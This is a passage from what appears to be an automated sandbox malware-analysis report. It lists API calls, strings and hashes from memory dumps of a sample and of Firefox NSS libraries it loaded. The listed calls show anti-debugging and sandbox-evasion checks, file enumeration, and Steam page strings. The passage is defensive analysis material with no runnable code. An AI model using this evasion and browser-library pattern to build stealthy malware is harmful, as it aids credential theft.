                                                                                                                                                                                          • FindNextFileA.KERNEL32(?,?), ref: 0002BEF1
                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 0002BF05
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$lstrcpy$Find$CloseCreatelstrcat$AllocCopyDeleteFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitlstrlen
                                                                                                                                                                                          • String ID: \*.*
                                                                                                                                                                                          • API String ID: 2055012574-1173974218
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_CallOnce.NSS3(6C6914E4,6C5FCC70), ref: 6C648D47
                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C648D98
                                                                                                                                                                                            • Part of subcall function 6C520F00: PR_GetPageSize.NSS3(6C520936,FFFFE8AE,?,6C4B16B7,00000000,?,6C520936,00000000,?,6C4B204A), ref: 6C520F1B
                                                                                                                                                                                            • Part of subcall function 6C520F00: PR_NewLogModule.NSS3(clock,6C520936,FFFFE8AE,?,6C4B16B7,00000000,?,6C520936,00000000,?,6C4B204A), ref: 6C520F25
                                                                                                                                                                                          • PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6C648E7B
                                                                                                                                                                                          • htons.WSOCK32(?), ref: 6C648EDB
                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C648F99
                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C64910A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
                                                                                                                                                                                          • String ID: %u.%u.%u.%u
                                                                                                                                                                                          • API String ID: 1845059423-1542503432
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C462C31
                                                                                                                                                                                          • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C462C61
                                                                                                                                                                                            • Part of subcall function 6C414DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C414E5A
                                                                                                                                                                                            • Part of subcall function 6C414DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C414E97
                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C462C82
                                                                                                                                                                                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C462E2D
                                                                                                                                                                                            • Part of subcall function 6C4281B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C4281DE
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
                                                                                                                                                                                          • String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
                                                                                                                                                                                          • API String ID: 801438305-4149320968
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • OpenInputDesktop.USER32(00000000,00000001,80000000), ref: 00021823
                                                                                                                                                                                          • SetThreadDesktop.USER32(00000000), ref: 0002182A
                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 0002183A
                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 0002184A
                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 00021859
                                                                                                                                                                                          • Sleep.KERNEL32(00002710), ref: 0002186B
                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 00021870
                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 0002187F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CursorSleep$Desktop$InputOpenThread
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3283940658-0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: $-$0$0$1$8$9$@
                                                                                                                                                                                          • API String ID: 0-3654031807
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.VCRUNTIME140(?,000000FF,?), ref: 6C488A4B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                          • String ID: ~qAl
                                                                                                                                                                                          • API String ID: 2221118986-1391548899
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.VCRUNTIME140(?,000000FF,?), ref: 6C4888F0
                                                                                                                                                                                          • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C48925C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                          • String ID: ~qAl
                                                                                                                                                                                          • API String ID: 2221118986-1391548899
                                                                                                                                                                                          • Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                                                                                                          • Instruction ID: cda67fab704e6609f528f21123785f9d67a4e5dda0a0a4a34db16295b7461e68
                                                                                                                                                                                          • Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                                                                                                          • Instruction Fuzzy Hash: 93B1C572E0650A8FDB14CF58CC81EADB7B2EF95314F140269C949EB785D731E98ACB90
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,0004B735,?,000484E6,?,000000BC,?), ref: 0004B10B
                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,0004B735,?,000484E6,?,000000BC,?), ref: 0004B134
                                                                                                                                                                                          • GetACP.KERNEL32(?,?,0004B735,?,000484E6,?,000000BC,?), ref: 0004B148
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                          • String ID: ACP$OCP
                                                                                                                                                                                          • API String ID: 2299586839-711371036
                                                                                                                                                                                          • Opcode ID: c0bbc5714f294603a991f1d394cc4a74bf7ffe277102f1a38af312f42a09aa31
                                                                                                                                                                                          • Instruction ID: 77f388d669254385d038683a6baca2567ded620cefc996ce1c73358683cddcfd
                                                                                                                                                                                          • Opcode Fuzzy Hash: c0bbc5714f294603a991f1d394cc4a74bf7ffe277102f1a38af312f42a09aa31
                                                                                                                                                                                          • Instruction Fuzzy Hash: FA01D471601706BAEB258B64EC56F9F36E8DB0436AF500075F501E40E1EB60DE41925D
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 0003D44E
                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0003D463
                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(0005332C), ref: 0003D46E
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 0003D48A
                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 0003D491
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2579439406-0
                                                                                                                                                                                          • Opcode ID: 0e100af76b5f5aa9b2fd7d100276e3f2ff64e2b379622f3f94eb8db018f8badd
                                                                                                                                                                                          • Instruction ID: 7d260cd8bf4e522c9fa7527c345d55a56e46ba6b43d398bc23cc7a9eb4b76fe9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e100af76b5f5aa9b2fd7d100276e3f2ff64e2b379622f3f94eb8db018f8badd
                                                                                                                                                                                          • Instruction Fuzzy Hash: B821BEB4C01304EBE741DF24F948A497BB4BF58305F90811BE81CA6261E7BC99C28B56
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C64D086
                                                                                                                                                                                          • PR_Malloc.NSS3(00000001), ref: 6C64D0B9
                                                                                                                                                                                          • PR_Free.NSS3(?), ref: 6C64D138
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeMallocstrlen
                                                                                                                                                                                          • String ID: >
                                                                                                                                                                                          • API String ID: 1782319670-325317158
                                                                                                                                                                                          • Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                                                                                                                          • Instruction ID: adb767c944b90e41e81721b64758baeba1dc0a7b84ca5deb7bd773836d1758ca
                                                                                                                                                                                          • Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                                                                                                                          • Instruction Fuzzy Hash: CFD15A62F456464FEB14487CCCA13EAB7938783378F58C329D9229BBE5E6198847C349
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: 0dl$Pdl$pdl$winUnlock$winUnlockReadLock
                                                                                                                                                                                          • API String ID: 0-83310023
                                                                                                                                                                                          • Opcode ID: e36d439e002658651447b12e74640cf11a6a27c65e33af77af07422615675aef
                                                                                                                                                                                          • Instruction ID: 391023630e934e9f5dda0cb373c3e781bd9c3466387ea2b22be0662af33938f9
                                                                                                                                                                                          • Opcode Fuzzy Hash: e36d439e002658651447b12e74640cf11a6a27c65e33af77af07422615675aef
                                                                                                                                                                                          • Instruction Fuzzy Hash: E0719D74608201AFDB04CF29D890EAABBF5FF8A318F14C618F95997311D730A985CBD6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: a801a5a08a67da65bab73bf0851728664f11588fc10e0a2a382212c5c9e04a00
                                                                                                                                                                                          • Instruction ID: caf2f866197b93b4b35ef762147f423e94afa69fa41a3086accf12c1cae9a108
                                                                                                                                                                                          • Opcode Fuzzy Hash: a801a5a08a67da65bab73bf0851728664f11588fc10e0a2a382212c5c9e04a00
                                                                                                                                                                                          • Instruction Fuzzy Hash: F8F11375F022168BDB04DF2AC9803A977F4AB8F308F254629C900DB750EB749991CBE9
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,00000000,00000000,00000000), ref: 6C5A1052
                                                                                                                                                                                          • memset.VCRUNTIME140(-0000001C,?,?,00000000), ref: 6C5A1086
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                          • String ID: h(Zl$h(Zl
                                                                                                                                                                                          • API String ID: 1297977491-728755956
                                                                                                                                                                                          • Opcode ID: 6c7774255afa2b6d090d4f843a656828ea5b3b5e8488b394ca614eb38c6de5b4
                                                                                                                                                                                          • Instruction ID: 3d7f7593e8847e680a2d6d4e991cca4ce56740c9cdb32f045217a524ef835ecb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c7774255afa2b6d090d4f843a656828ea5b3b5e8488b394ca614eb38c6de5b4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 68A11F71B0125A9FDF08CF9AC8909EEBBB6BF8D314B148129E915A7700D735DD16CBA0
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,0027E908,?,?,?,000328A1,?,?,00000000), ref: 00031E7D
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?,?,?,?,000328A1,?,?,00000000), ref: 00031E8A
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,000328A1,?,?,00000000), ref: 00031E91
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Heap$AllocBinaryCryptProcessString
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1871034439-0
                                                                                                                                                                                          • Opcode ID: a719a0bc9baf7c4e72d5608de63ef05c5b5d8cf645f89d9a22a1a9d884da6050
                                                                                                                                                                                          • Instruction ID: 03f45ee948e8153446f6d8778ac036ff58d799ae2ceb511e6eeb5e78c6c71429
                                                                                                                                                                                          • Opcode Fuzzy Hash: a719a0bc9baf7c4e72d5608de63ef05c5b5d8cf645f89d9a22a1a9d884da6050
                                                                                                                                                                                          • Instruction Fuzzy Hash: 82010C71500209BFDF129F61DC899AF7BBEFF4D3A4B244458F80597110D7329991EB60
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CryptStringToBinaryA.CRYPT32(00026724,00000000,00000001,00000000,?,00000000,00000000), ref: 00028060
                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,?,?,?,00026724,?), ref: 0002806E
                                                                                                                                                                                          • CryptStringToBinaryA.CRYPT32(00026724,00000000,00000001,00000000,?,00000000,00000000), ref: 00028084
                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,?,00026724,?), ref: 00028093
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: BinaryCryptLocalString$AllocFree
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4291131564-0
                                                                                                                                                                                          • Opcode ID: 05008b0c59ef689a6e6bc2b19cda018845fa5256b77c1b2fe58b8c94f5ea7174
                                                                                                                                                                                          • Instruction ID: bb09448e3d23d1f7135e8a1f6601b9172838c95a7a1d749cc27c7f025f80c950
                                                                                                                                                                                          • Opcode Fuzzy Hash: 05008b0c59ef689a6e6bc2b19cda018845fa5256b77c1b2fe58b8c94f5ea7174
                                                                                                                                                                                          • Instruction Fuzzy Hash: E2F0E774102234BBDF715F66EC8DE8B7FADEF0ABA0B104495F909E6250E7714980DBA1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: 0dl$Pdl$pdl$winUnlockReadLock
                                                                                                                                                                                          • API String ID: 0-2880156936
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • InitializeConditionVariable.KERNEL32(?), ref: 6C456D45
                                                                                                                                                                                          • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C456E1E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ConditionExclusiveInitializeLockReleaseVariable
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4169067295-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C), ref: 6C58EE3D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • m" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunity, xrefs: 6C58EF0E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Alloc_ArenaUtil
                                                                                                                                                                                          • String ID: m" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunity
                                                                                                                                                                                          • API String ID: 2062749931-1856350843
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C55F019
                                                                                                                                                                                          • PK11_GenerateRandom.NSS3(?,00000000), ref: 6C55F0F9
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorGenerateK11_Random
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3009229198-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLocalTime.KERNEL32(?,759183C0,00000000,?,?,?,?,?,?,?,?,0003C5A4,?), ref: 0003C13E
                                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,0003C5A4,?), ref: 0003C14C
                                                                                                                                                                                            • Part of subcall function 0003B92A: FileTimeToSystemTime.KERNEL32(?,?,?,?,0003C211,?,?,?,?,?,?,?,?,?,?,0003C5B4), ref: 0003B942
                                                                                                                                                                                            • Part of subcall function 0003B906: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0003B923
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 568878067-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 0002146D
                                                                                                                                                                                          • NtQueryInformationProcess.NTDLL(00000000), ref: 00021474
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$CurrentInformationQuery
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3953534283-0
                                                                                                                                                                                          • Opcode ID: 08a3d705b46f296aad9a42aa88a96c34b077748fbb61d8d0d29f304868721147
                                                                                                                                                                                          • Instruction ID: 36fe21e7603d40404e9793fc032998b6e779350d631c8fa5de68fe0dd005429e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 08a3d705b46f296aad9a42aa88a96c34b077748fbb61d8d0d29f304868721147
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FE01271640304F7EF509BA0ED0AF9E72ECD704749F1000A4A30AE60C0D6B8DA0096A5
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • .exesvchost.exesvchost.exesvchost.exesvchost.exeOfficeClickToRun.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exectfmon., xrefs: 6C48B058
                                                                                                                                                                                          • em" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunit, xrefs: 6C48B024, 6C48B0F1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: .exesvchost.exesvchost.exesvchost.exesvchost.exeOfficeClickToRun.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exectfmon.$em" href="https://store.steampowered.com/">Home</a><a class="submenuitem" href="https://store.steampowered.com/explore/">Discovery Queue</a><a class="submenuitem" href="https://steamcommunit
                                                                                                                                                                                          • API String ID: 0-1746701309
                                                                                                                                                                                          • Opcode ID: d81046726fdaaf2ef9aed6e5a33fa459cd6e22c03343ac7a457f96d5a771752f
                                                                                                                                                                                          • Instruction ID: 582f0efdde7f19fb7d060f4c24e16504ccd84a9f41ac3b22e40c224f08f95c87
                                                                                                                                                                                          • Opcode Fuzzy Hash: d81046726fdaaf2ef9aed6e5a33fa459cd6e22c03343ac7a457f96d5a771752f
                                                                                                                                                                                          • Instruction Fuzzy Hash: EAF13A7160A7458FD700CF28C890FAAB7E2AFC5359F188A2DE5D4877C1E7B4D8858792
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memcmp.VCRUNTIME140(?,?,6C424A63,?,?), ref: 6C455F06
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcmp
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1475443563-0
                                                                                                                                                                                          • Opcode ID: 357dfc86968879c43831ecf9eb23d576011d3da6b985e398d27f2c0ca09accd9
                                                                                                                                                                                          • Instruction ID: 3b43a16bd6a7c425705fe3f46fdd28419c1b8d8b39ec98bd9765b5d8eb058c31
                                                                                                                                                                                          • Opcode Fuzzy Hash: 357dfc86968879c43831ecf9eb23d576011d3da6b985e398d27f2c0ca09accd9
                                                                                                                                                                                          • Instruction Fuzzy Hash: C6C1D375E012098BCB04CF95D190EEEBBF2FF89318F68815DD8556BB44D732A816CB80
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • EnumSystemLocalesA.KERNEL32(Function_0002B1C1,00000001), ref: 0004B56F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: EnumLocalesSystem
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2099609381-0
                                                                                                                                                                                          • Opcode ID: 9b65454bbc1976e855a01acc00ae5beac1ba27be4dbe48e7c17048d83bc369e7
                                                                                                                                                                                          • Instruction ID: 9214e0efad2df45bb96726ab5058534ff2cb6480f02f0aef04f4057199bac3be
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9b65454bbc1976e855a01acc00ae5beac1ba27be4dbe48e7c17048d83bc369e7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 17D0A7B1A50B009BE7204F30DD497F17BE0FF10B16F70985DDD92490D0D7B4A5958605
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_000275EC), ref: 00047633
